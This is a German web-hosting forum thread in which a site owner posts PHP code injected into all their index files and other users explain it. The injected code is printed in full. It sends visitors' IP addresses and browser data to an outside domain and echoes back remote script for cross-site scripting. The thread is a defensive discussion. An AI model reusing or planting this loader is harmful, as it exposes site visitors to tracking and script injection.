Code injection

k.a.rotte · 2. Januar 2014 um 15:16

Hi,

habe eine Einschleusung von Codezeilen entdeckt, gestern um 1h nachts.
Sämtliche index-Dateien aller Unterseiten wurden mir folgendem Code ergänzt und wieder auf den Server gepackt, außerdem wurden in leeren Ordnern automatisch welche erstellt.

<?php
#b9f65d#
error_reporting(0); ini_set('display_errors',0); $wp_vw10309 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_vw10309) && !preg_match ('/bot/i', $wp_vw10309))){
$wp_vw0910309="http://"."tags"."value".".com/value"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_vw10309);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_vw0910309);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_10309vw = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_10309vw,1,3) === 'scr' ){ echo $wp_10309vw; }
#/b9f65d#
?>
<?php

?>

Meine Frage wäre nun, ob mir jemand erklären könnte was genau passiert ?

Vielen Dank im Voraus

White-Tiger · 2. Januar 2014 um 16:29

Wenn das alles war, ist zumindest den Users nix passiert da du vermutlich kein bplaced Pro hast und damit externe Verbindungen sowieso nicht möglich sind
Ansonsten wären IP, Besuchte Seite etc. an iwen übermittelt worden^^

Allerdings sieht der Code nicht nach allem aus^^ Sieht eher so aus als würde er vom externen Server nen scr=“xxx” übermitteln… würde nem iframe oder image etc. zugeordnet werden können… dafür müsste aber der HTML Tag iwo sein.

Jedenfalls sei soweit beruhigt das es keiner gezielt auf dich abgesehen hat Dort nutz nur jemand seinen Bot oder was auch immer um alle Wordpress Seiten die Sicherheitslücken haben zu manipulieren^^ Gibt genug solcher Seiten im Netz weil die Betreiber meist wenig Ahnung haben bzw. gar keine.
Weswegen man zumindest seine Software immer aktuell halten muss. Auch mit Erweiterungen aufpassen und nicht jeden misst installieren nach dem Motto: passt schon

k.a.rotte · 2. Januar 2014 um 16:39

1000 Dank für die schnelle & profunde Antwort.

Balmung · 2. Januar 2014 um 19:24

ist z.B. dann true, wenn $wp_10309vw mit "<script " beginnnt.
Schaut mir nach [url=http://de.wikipedia.org/wiki/Cross-Site-Scripting]Cross-Site-Scripting[/url] aus, und solltest du schnell entfernen und die Sicherheitslücke ausfindig machen und schließen (oder die Software, die du nutzt, aktualisieren).

Wenn JavaScript eingeschleust wird, was hier scheinbar der Fall ist, können Cookies ausgelesen werden und weitergesendet werden.

[color=#BF0000][b]Edit[/b][/color]
Die IP hinter der Domain tagsvalue.com (die Domain an die der cURL Request geht) gehört scheinbar zu 3nt.com. Vielleicht lohnt es sich zusätzlich(!) eine Mail an [abuse@3nt.com](mailto:abuse@3nt.com) zu senden.

mfg Balmung

ist z.B. dann true, wenn $wp_10309vw mit "<script " beginnnt.
Schaut mir nach Cross-Site-Scripting aus, und solltest du schnell entfernen und die Sicherheitslücke ausfindig machen und schließen (oder die Software, die du nutzt, aktualisieren).

Wenn JavaScript eingeschleust wird, was hier scheinbar der Fall ist, können Cookies ausgelesen werden und weitergesendet werden.

Edit
Die IP hinter der Domain tagsvalue.com (die Domain an die der cURL Request geht) gehört scheinbar zu 3nt.com. Vielleicht lohnt es sich zusätzlich(!) eine Mail an abuse@3nt.com zu senden.

mfg Balmung